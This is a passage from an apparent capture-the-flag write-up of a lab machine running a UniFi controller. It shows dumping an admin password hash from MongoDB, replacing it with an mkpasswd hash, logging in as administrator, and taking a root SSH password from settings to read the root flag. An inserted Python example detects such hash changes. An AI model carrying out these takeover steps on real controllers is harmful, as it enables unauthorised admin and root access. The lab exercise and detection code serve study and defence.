{ "_id" : ObjectId("61ce278f46e0fb0012d47ee4"), "name" : "administrator", "email" : "administrator@unified.htb", "x_shadow" : "$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.",

The value is

"$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4."

It looks like an /etc/shadow SHA-512 hash. To understand /etc/shadow, read this article

Let’s use mkpasswd, a tool that generates, encrypts, or hashes passwords, often for user accounts

encrypt new password with sha512
nopedawn@npdn ~/L/H/S/Unified> mkpasswd -m SHA-512 SujatmikoArafuru321
$6$N9G8lAmz4mW/Ldo1$sRMAL6oRC4lfcrl.cnV6W6pUprMdUQJr7E/VfAt8Gs9gtYeHQdj9XqofI6fxZRa5m5AOYRSZ7l.8DIE7qc2PG0

Let’s update the admin user’s password

update admin password
db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$N9G8lAmz4mW/Ldo1$sRMAL6oRC4lfcrl.cnV6W6pUprMdUQJr7E/VfAt8Gs9gtYeHQdj9XqofI6fxZRa5m5AOYRSZ7l.8DIE7qc2PG0"}})
admin password updated
lldb.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$N9G8lAmz4mW/Ldo1$sRMAL6oRC4lfcrl.cnV6W6pUprMdUQJr7E/VfAt8Gs9gtYeHQdj9XqofI6fxZRa5m5AOYRSZ7l.8DIE7qc2PG0"}})
WriteResult({ "nMatched" : 1, "nUpserted" : 0, "nModified" : 1 })
>                                                                     
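A write made directly in the database, as above, does not go through the controller's own password-change flow, so the place to catch it is the data itself. The following added example (not part of the original walkthrough) compares two exports of the admin collection and reports changed x_shadow values together with their crypt parameters. The documents and hashes are constructed placeholders, and the function names are hypothetical.

```python
CRYPT_SCHEMES = {"1": "md5-crypt", "5": "sha256-crypt", "6": "sha512-crypt"}


def parse_crypt(value):
    """Split a crypt(3) string of the form $id$[rounds=N$]salt$digest."""
    parts = value.split("$")
    if len(parts) not in (4, 5) or parts[0] != "" or parts[1] not in CRYPT_SCHEMES:
        raise ValueError("unsupported or malformed crypt string")
    rounds = None
    if len(parts) == 5:
        if not parts[2].startswith("rounds="):
            raise ValueError("unexpected field in crypt string")
        rounds = int(parts[2][len("rounds="):])
    return {"scheme": CRYPT_SCHEMES[parts[1]], "rounds": rounds,
            "salt": parts[-2], "digest_len": len(parts[-1])}


def diff_admins(baseline, current):
    """Compare two exports of the admin collection, keyed by _id."""
    old = {doc["_id"]: doc for doc in baseline}
    new = {doc["_id"]: doc for doc in current}
    events = []
    for _id, doc in new.items():
        if _id not in old:
            events.append({"event": "admin-added", "name": doc["name"]})
        elif doc["x_shadow"] != old[_id]["x_shadow"]:
            before = parse_crypt(old[_id]["x_shadow"])
            after = parse_crypt(doc["x_shadow"])
            # A different salt length or scheme suggests the hash was produced
            # by another tool than the one that wrote the original. On this
            # page the stored salts are 8 characters, the mkpasswd one is 16.
            events.append({"event": "hash-changed", "name": doc["name"],
                           "scheme": after["scheme"],
                           "salt_len": (len(before["salt"]), len(after["salt"]))})
    for _id in old.keys() - new.keys():
        events.append({"event": "admin-removed", "name": old[_id]["name"]})
    return events


# Constructed sample data: placeholder ids, salts and digests, not real hashes.
BASELINE = [
    {"_id": "id-0001", "name": "administrator",
     "x_shadow": "$6$" + "saltsalt" + "$" + "A" * 86},
    {"_id": "id-0002", "name": "michael",
     "x_shadow": "$6$" + "tlastlas" + "$" + "B" * 86},
]
CURRENT = [
    {"_id": "id-0001", "name": "administrator",
     "x_shadow": "$6$" + "sixteencharsalt1" + "$" + "C" * 86},
    {"_id": "id-0002", "name": "michael",
     "x_shadow": "$6$" + "tlastlas" + "$" + "B" * 86},
]

if __name__ == "__main__":
    for event in diff_admins(BASELINE, CURRENT):
        print(event)
```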

Now we can log in to https://10.129.51.77:8443/ using the password I created earlier

credential:

  • administrator:SujatmikoArafuru321

Voila! logged in

We can now go to settings

/manage/site/default/settings/site

Look for Device Authentication, where we get the SSH credentials to gain root access

SSH Authentication:

  • Username: root
  • Password: NotACrackablePassword4U2022
connect root via ssh
nopedawn@npdn ~/L/H/S/Unified> ssh root@10.129.51.77
The authenticity of host '10.129.51.77 (10.129.51.77)' can't be established.
ED25519 key fingerprint is SHA256:RoZ8jwEnGGByxNt04+A/cdluslAwhmiWqG3ebyZko+A.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.51.77' (ED25519) to the list of known hosts.
root@10.129.51.77's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


root@unified:~# whoami
root
root@unified:~# id
uid=0(root) gid=0(root) groups=0(root)
root@unified:~#

Use find to search for root.txt. The root flag is stored in /root/root.txt

root flag
root@unified:~# find / -name root.txt 2>/dev/null
/root/root.txt
root@unified:~# cat /root/root.txt
REDACTED
root@unified:~#

Source:

https://nvd.nist.gov/vuln/detail/cve-2021-44228
https://community.ui.com/…/CVE-2021-44228/
https://community.ui.com/…/Password-recovery-db-admin-find-empty/
https://www.sprocketsecurity.com/…/another-log4j-on-the-fire-unifi
https://www.mongodb.com/…/db.collection.update